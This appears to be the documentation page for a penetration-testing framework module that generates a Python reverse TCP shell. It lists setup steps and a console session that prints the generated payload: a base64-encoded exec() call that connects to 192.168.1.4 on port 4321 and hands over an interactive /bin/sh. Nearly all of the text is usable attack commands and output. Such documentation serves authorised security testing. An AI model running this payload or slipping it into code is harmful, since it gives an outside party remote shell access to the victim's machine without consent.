## Description

Module generates payload that creates interactive tcp reverse shell by using python. 

## Verification Steps

  1. Start `./rsf.py`
  2. Do: `use payloads/python/reverse_tcp`
  3. Do: `set lhost 192.168.1.4`
  3. Do: `set lport 4321`
  4. Do: `run`
  5. Module generates python tcp reverse shell payload

## Scenarios

```
rsf > use payloads/python/reverse_tcp
rsf (Python Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Python Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Python Reverse TCP) > run
[*] Running module...
[*] Generating payload
exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))
```